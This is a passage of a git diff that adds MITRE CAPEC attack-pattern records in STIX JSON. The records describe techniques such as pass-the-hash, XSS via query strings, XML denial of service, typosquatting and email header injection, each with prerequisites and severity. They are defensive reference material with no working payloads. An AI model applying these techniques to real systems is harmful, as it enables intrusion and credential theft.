b/capec/attack-pattern/attack-pattern--c0b51030-b2f4-4d4a-9de0-06dea9a929ba.json new file mode 100644 index 0000000000..5c8fe02601 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--c0b51030-b2f4-4d4a-9de0-06dea9a929ba.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--1d184a8f-a439-495c-89d0-f50fbf76b3d9", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--c0b51030-b2f4-4d4a-9de0-06dea9a929ba", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Dumpster Diving", + "description": "An adversary cases an establishment and searches through trash bins, dumpsters, or areas where company information may have been accidentally discarded for information items which may be useful to the dumpster diver. The devastating nature of the items and/or information found can be anything from medical records, resumes, personal photos and emails, bank statements, account details or information about software, tech support logs and so much more. By collecting this information an adversary may be able to learn important facts about the person or organization that play a role in helping the adversary in their attack.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/406.html", + "external_id": "CAPEC-406" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "url": "http://www.social-engineer.org", + "external_id": "REF-348" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Other (Documents and materials improperly disposed of can lead to information disclosure if an adversary comes across it.)" + ] + }, + "x_capec_prerequisites": [ + "An adversary must have physical access to the dumpster or downstream processing facility." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--c0c8edaa-45cb-4b5d-8927-5d34e5c165ee.json b/capec/attack-pattern/attack-pattern--c0c8edaa-45cb-4b5d-8927-5d34e5c165ee.json new file mode 100644 index 0000000000..6f8fe730ad --- /dev/null +++ b/capec/attack-pattern/attack-pattern--c0c8edaa-45cb-4b5d-8927-5d34e5c165ee.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--8d6a67a3-a3c7-468c-94d2-b61722ea5dc1", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--c0c8edaa-45cb-4b5d-8927-5d34e5c165ee", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Interception", + "description": "An adversary monitors data streams to or from the target for information gathering purposes. This attack may be undertaken to solely gather sensitive information or to support a further attack against the target. This attack pattern can involve sniffing network traffic as well as other types of data streams (e.g. radio). The adversary can attempt to initiate the establishment of a data stream or passively observe the communications as they unfold. In all variants of this attack, the adversary is not the intended recipient of the data stream. In contrast to other means of gathering information (e.g., targeting data leaks), the adversary must actively position himself so as to observe explicit data channels (e.g. network traffic) and read the content. However, this attack differs from a Man-In-the-Middle (MITM) attack, as the adversary does not alter the content of the communications nor forward data to the intended recipient.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/117.html", + "external_id": "CAPEC-117" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/319.html", + "external_id": "CWE-319" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target must transmit data over a medium that is accessible to the adversary." + ], + "x_capec_resources_required": [ + "The adversary must have the necessary technology to intercept information passing between the nodes of a network. For TCP/IP, the capability to run tcpdump, ethereal, etc. can be useful. Depending upon the data being targeted the technological requirements will change." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--c1083be5-f4b3-4ecd-9baf-c0e88e70226e.json b/capec/attack-pattern/attack-pattern--c1083be5-f4b3-4ecd-9baf-c0e88e70226e.json new file mode 100644 index 0000000000..7b63eaa95b --- /dev/null +++ b/capec/attack-pattern/attack-pattern--c1083be5-f4b3-4ecd-9baf-c0e88e70226e.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--e34abae4-901f-44e6-bec5-3c24774d3ff5", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--c1083be5-f4b3-4ecd-9baf-c0e88e70226e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Use of Captured Hashes (Pass The Hash)", + "description": "An adversary uses stolen hash values for a user's credentials (username and password) to access systems managed under the same credential framwork that leverage the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols. When authenticating via LM or NTLM, the hashed credentials' associated plaintext credentials are not requried for successful authentication. Therefore, if an adversary can obtain the hashed credentials of a user, he can then pass these hash values to the server or service to authenticate without needing to brute-force the hashes to obtain their cleartext values. The adversary can then impersonate the user and laterally move within the network. This technique can be performed against any operating system which leverages the LM or NTLM protocols.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/644.html", + "external_id": "CAPEC-644" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html", + "external_id": "CWE-522" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Integrity": [ + "Gain Privileges" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary needs to first obtain the hashed credentials of a user, via the use of a tool, prior to executing this attack.", + "The victim system must allow Lan Man or NT Lan Man authentication." + ], + "x_capec_skills_required": { + "High": "The adversary uses a third-party tool to obtain hashed credentials to execute the attack.", + "Low": "Determine if Lan Man and NT Lan Man authentication is allowed on the server." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--c15d4233-e0f7-4992-862c-862da665a29f.json b/capec/attack-pattern/attack-pattern--c15d4233-e0f7-4992-862c-862da665a29f.json new file mode 100644 index 0000000000..38c37ae656 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--c15d4233-e0f7-4992-862c-862da665a29f.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--46a3ac83-a981-4786-bb82-cda1fd9f09ce", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--c15d4233-e0f7-4992-862c-862da665a29f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-04-25T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Modification of Windows Service Configuration", + "description": "An adversary exploits a weakness in access control to modify the execution parameters of a Windows service. Specifically, if the permissions for users and groups are not properly assigned and allow access to the registry keys used to store the configuration information for a service, then an adversary could change settings defining the path to the executable and cause a malicious binary to be executed.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/478.html", + "external_id": "CAPEC-478" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html", + "external_id": "CWE-284" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Integrity": [ + "Execute Unauthorized Commands (By altering specific configuration settings for the service, the adversary could run arbitrary code to be executed.)" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the capability to write to the Windows Registry on the targeted system." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Usable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--c16f9360-53b6-442f-9b6a-cee279944a91.json b/capec/attack-pattern/attack-pattern--c16f9360-53b6-442f-9b6a-cee279944a91.json new file mode 100644 index 0000000000..919525d131 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--c16f9360-53b6-442f-9b6a-cee279944a91.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--6fcde78b-16a9-4796-972e-bca4bb37988d", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--c16f9360-53b6-442f-9b6a-cee279944a91", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Modification of Existing Components with Counterfeit Hardware", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-452 : Malicious Logic Insertion into Product Hardware. Please refer to this other pattern going forward.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/454.html", + "external_id": "CAPEC-454" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--c1a553a6-7db5-4b2f-95ef-434f08a2c84e.json b/capec/attack-pattern/attack-pattern--c1a553a6-7db5-4b2f-95ef-434f08a2c84e.json new file mode 100644 index 0000000000..e0ab9f7ce1 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--c1a553a6-7db5-4b2f-95ef-434f08a2c84e.json @@ -0,0 +1,67 @@ +{ + "type": "bundle", + "id": "bundle--1a99e7bf-58a2-4e8a-8842-8e754994a59c", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--c1a553a6-7db5-4b2f-95ef-434f08a2c84e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "XSS Through HTTP Query Strings", + "description": "An adversary embeds malicious script code in the parameters of an HTTP query string and convinces a victim to submit the HTTP request that contains the query string to a vulnerable web application. The web application then procedes to use the values parameters without properly validation them first and generates the HTML code that will be executed by the victim's browser.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/32.html", + "external_id": "CAPEC-32" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/80.html", + "external_id": "CWE-80" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "http://user:host@example.com:8080/oradb", + "\n Web applications that accept name value pairs in a HTTP Query string are inherently at risk to any value (or name for that matter) that an attacker would like to enter in the query string. This can be done manually via web browser or trivially scripted to post the query string to multiple sites. In the latter case, in the instance of many sites using similar infrastructure with predictable http queries being accepted and operated on (such as blogging software, Google applications, and so on), a single malicious payload can be scripted to target a wide variety of sites.\n Web 2.0 type sites like Technorati and del.icio.us rely on user generated content like tags to build http links that are displayed to other users. del.icio.us allows users to identify sites, tag them with metadata and provide URL, descriptions and more data. This data is then echoed back to any other web browser that is interested in the link. If the data is not validated by the del.icio.us site properly then an arbitrary code can be added into the standard http string sent to del.icio.us by the attacker, for example formatted as normal content with a URL and description and tagged as Java, and available to be clicked on (and executed by) any user browsing for Java content that clicks on this trojaned content.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target client software must allow scripting such as JavaScript. Server software must allow display of remote generated HTML without sufficient input or output validation." + ], + "x_capec_resources_required": [ + "Ability to send HTTP post to scripting host and collect output" + ], + "x_capec_skills_required": { + "High": "Exploiting any information gathered by HTTP Query on script host", + "Low": "To place malicious payload on server via HTTP" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--c29999db-082a-4dff-b420-73f324a13bc1.json b/capec/attack-pattern/attack-pattern--c29999db-082a-4dff-b420-73f324a13bc1.json new file mode 100644 index 0000000000..77fbda2703 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--c29999db-082a-4dff-b420-73f324a13bc1.json @@ -0,0 +1,93 @@ +{ + "type": "bundle", + "id": "bundle--57a19d5f-959d-4be3-844a-ec5680fb0dfa", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--c29999db-082a-4dff-b420-73f324a13bc1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "XML Oversized Payloads", + "description": "Applications often need to transform data in and out of the XML format by using an XML parser. It may be possible for an adversary to inject data that may have an adverse effect on the XML parser when it is being processed. By supplying oversized payloads in input vectors that will be processed by the XML parser, an adversary can cause the XML parser to consume more resources while processing, causing excessive memory consumption and CPU utilization, and potentially cause execution of arbitrary code. An adversary's goal is to leverage parser failure to his or her advantage. In many cases this type of an attack will result in a XML Denial of Service (XDoS) due to an application becoming unstable, freezing, or crashing. However it is possible to cause a crash resulting in arbitrary code execution, leading to a jump from the data plane to the control plane [R.231.1]. XDoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious XML payloads to the service provider designed to exhaust the service provider's memory, CPU, and/or disk space. The main weakness in XDoS is that the service provider generally must inspect, parse, and validate the XML messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that XDoS targets. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/231.html", + "external_id": "CAPEC-231" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/112.html", + "external_id": "CWE-112" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/19.html", + "external_id": "CWE-19" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/674.html", + "external_id": "CWE-674" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html", + "external_id": "CWE-770" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Shlomo, Yona, XML Parser Attacks: A summary of ways to attack an XML Parser, 2007", + "url": "http://yeda.cs.technion.ac.il/~yona/talks/xml_parser_attacks/slides/slide2.html", + "external_id": "REF-89" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "XML Denial of Service (XML DoS)" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption", + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An application uses an XML parser to perform transformation on user-controllable data.", + "An application does not perform sufficient validation to ensure that user-controllable data is safe for an XML parser." + ], + "x_capec_skills_required": { + "High": "Arbitrary code execution", + "Low": "Denial of service" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--c2badafc-32b2-4509-89e2-cffa64e220f9.json b/capec/attack-pattern/attack-pattern--c2badafc-32b2-4509-89e2-cffa64e220f9.json new file mode 100644 index 0000000000..bbe4b5b26c --- /dev/null +++ b/capec/attack-pattern/attack-pattern--c2badafc-32b2-4509-89e2-cffa64e220f9.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--dd303363-7163-4771-a852-f924d214a90b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--c2badafc-32b2-4509-89e2-cffa64e220f9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "name": "Provide Counterfeit Component", + "description": "An attacker provides a counterfeit component during the procurement process of a lower-tier component supplier to a sub-system developer or integrator, which is then built into the system being upgraded or repaired by the victim, allowing the attacker to cause disruption or additional compromise.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/530.html", + "external_id": "CAPEC-530" + }, + { + "source_name": "reference_from_CAPEC", + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf", + "external_id": "REF-439" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "The attacker, aware that the victim has contracted with an integrator for system maintenance and that the integrator uses commercial-off-the-shelf network hubs, develops their own network hubs with a built-in malicious capability for remote access, the malicious network hubs appear to be a well-known brand of network hub but are not. The attacker then advertises to the sub-system integrator that they are a legit supplier of network hubs, and offers them at a reduced price to entice the integrator to purchase these network hubs. The integrator then installs the attacker's hubs at the victim's location, allowing the attacker to remotely compromise the victim's network." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge about the target system and sub-components." + ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious system components that resemble legitimate name-brand components." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--c2ed7aea-f0e3-433b-9d06-453dcd1a21be.json b/capec/attack-pattern/attack-pattern--c2ed7aea-f0e3-433b-9d06-453dcd1a21be.json new file mode 100644 index 0000000000..d4d87e3f1d --- /dev/null +++ b/capec/attack-pattern/attack-pattern--c2ed7aea-f0e3-433b-9d06-453dcd1a21be.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--5933576c-6701-474b-8f1a-e09506d5c6b4", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--c2ed7aea-f0e3-433b-9d06-453dcd1a21be", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Altered Component Firmware", + "description": "An adversary with access to download and update system software sends a maliciously altered BIOS to the victim or victim supplier/integrator, which when installed allows for future exploitation.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/638.html", + "external_id": "CAPEC-638" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "An attacker compromises the download and update portion of a manufacturer's web presence, and develops a malicious BIOS that in addition to the normal functionality will also at a specific time of day disable the remote access subsystem's security checks. The malicious BIOS is put in place on the manufacturer's website, the victim location is sent an official-looking email informing the victim of the availability of a new BIOS with bug fixes and enhanced performance capabilities to entice the victim to install the new BIOS quickly. The malicious BIOS is downloaded and installed on the victim's system, which allows for additional compromise by the attacker." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge about the installed target system design.", + "Advanced knowledge about the download and update installation processes.", + "Access to the download and update system(s) used to deliver BIOS images." + ], + "x_capec_skills_required": { + "High": "Able to develop a malicious BIOS image with the original functionality as a normal BIOS image, but with added functionality that allows for later compromise and/or disruption." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--c3ea9757-0ac9-42b7-96df-a6dfe6f85838.json b/capec/attack-pattern/attack-pattern--c3ea9757-0ac9-42b7-96df-a6dfe6f85838.json new file mode 100644 index 0000000000..5bef0fa1cc --- /dev/null +++ b/capec/attack-pattern/attack-pattern--c3ea9757-0ac9-42b7-96df-a6dfe6f85838.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--8e8ee8ad-f184-453f-8efc-ccef4578f487", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--c3ea9757-0ac9-42b7-96df-a6dfe6f85838", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "TypoSquatting", + "description": "An adversary registers a domain name with at least one character different than a trusted domain. A TypoSquatting attack takes advantage of instances where a user mistypes a URL (e.g. www.goggle.com) or not does visually verify a URL before clicking on it (e.g. phishing attack). As a result, the user is directed to an adversary-controlled destination. TypoSquatting does not require an attack against the trusted domain or complicated reverse engineering.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/630.html", + "external_id": "CAPEC-630" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Nick Nikiforakis, Marco Balduzzi, Lieven Desmet, Frank Piessens, Wouter Joosen, Soundsquatting: Uncovering the Use of Homophones in Domain Squatting, Trend Micro", + "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-soundsquatting.pdf", + "external_id": "REF-491" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Other": [ + "Other (Depending on the intention of the adversary, a successful TypoSquatting attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials.)" + ] + }, + "x_capec_example_instances": [ + "\n An adversary sends an email, impersonating paypal.com, to a user stating that they have just received a money transfer and to click the given link to obtain their money.\n However, the link the in email is paypa1.com instead of paypal.com, which the user clicks without fully reading the link.\n The user is directed to the adversary's website, which appears as if it is the legitimate paypal.com login page.\n The user thinks they are logging into their account, but have actually just given their paypal credentials to the adversary. The adversary can now use the user's legitimate paypal credentials to log into the user's account and steal any money which may be in the account.\n TypoSquatting vulnerability allows an adversary to impersonate a trusted domain and trick a user into visiting the malicious website to steal user credentials.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be able to register DNS hostnames/URL\u2019s." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--c4a85859-9626-4221-bece-27a5dc5a238f.json b/capec/attack-pattern/attack-pattern--c4a85859-9626-4221-bece-27a5dc5a238f.json new file mode 100644 index 0000000000..51d1d0ea15 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--c4a85859-9626-4221-bece-27a5dc5a238f.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--ee6bbbf3-66c1-4930-a855-2e3f3866a8cf", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--c4a85859-9626-4221-bece-27a5dc5a238f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence via Psychological Principles", + "description": "The adversary shapes the target's actions or behavior by focusing on the ways human interact and learn, leveraging such elements as cognitive and social psychology. In a variety of ways, a target can be influenced to behave or perform an action through capitalizing on what scholarship and research has learned about how and why humans react to specific scenarios and cues.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/427.html", + "external_id": "CAPEC-427" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "url": "http://www.social-engineer.org", + "external_id": "REF-348" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that successfully influence the target into performing an action via psychological principles can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that successfully influence the target into performing an action via psychological principles can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that successfully influence the target into performing an action via psychological principles can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--c4b5e88c-a86a-466f-a884-545bc54e6b4d.json b/capec/attack-pattern/attack-pattern--c4b5e88c-a86a-466f-a884-545bc54e6b4d.json new file mode 100644 index 0000000000..7086f09ec0 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--c4b5e88c-a86a-466f-a884-545bc54e6b4d.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--42fccbd4-79d2-49ad-918d-a21d5b5e4c68", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--c4b5e88c-a86a-466f-a884-545bc54e6b4d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Email Injection", + "description": "An attacker manipulates the headers and content of an email message by injecting data via the use of delimiter characters native to the protocol. Many applications allow users to send email messages by filling in fields. For example, a web site may have a link to \"share this site with a friend\" where the user provides the recipient's email address and the web application fills out all the other fields, such as the subject and body. In this pattern, an attacker adds header and body information to an email message by injecting additional content in an input field used to construct a header of the mail message. This attack takes advantage of the fact that RFC 822 requires that headers in a mail message be separated by a carriage return. As a result, an attacker can inject new headers or content simply by adding a delimiting carriage return and then supplying the new heading and body information. This attack will not work if the user can only supply the message body since a carriage return in the body is treated as a normal character.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/134.html", + "external_id": "CAPEC-134" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/150.html", + "external_id": "CWE-150" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "The target application must allow the user to send email to some recipient, to specify the content at least one header field in the message, and must fail to sanitize against the injection of command separators.", + "The adversary must have the ability to access the target mail application." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--c4cead7e-9d5e-4551-9100-ddc2098d6f30.json b/capec/attack-pattern/attack-pattern--c4cead7e-9d5e-4551-9100-ddc2098d6f30.json new file mode 100644 index 0000000000..eaff5ef89b --- /dev/null +++ b/capec/attack-pattern/attack-pattern--c4cead7e-9d5e-4551-9100-ddc2098d6f30.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--7a37f6d4-8580-4373-a376-21e9fb08007a", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--c4cead7e-9d5e-4551-9100-ddc2098d6f30", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "HTTP DoS", + "description": "An attacker performs flooding at the HTTP level to bring down only a particular web application rather than anything listening on a TCP/IP connection. This denial of service attack requires substantially fewer packets to be sent which makes DoS harder to detect. This is an equivalent of SYN flood in HTTP. The idea is to keep the HTTP session alive indefinitely and then repeat that hundreds of times. This attack targets resource depletion weaknesses in web server software. The web server will wait to attacker's responses on the initiated HTTP sessions while the connection threads are being exhausted.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/469.html", + "external_id": "CAPEC-469" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html", + "external_id": "CWE-770" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/772.html", + "external_id": "CWE-772" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Robert Hansen, Slowris HTTP DoS, 2009--06---17", + "url": 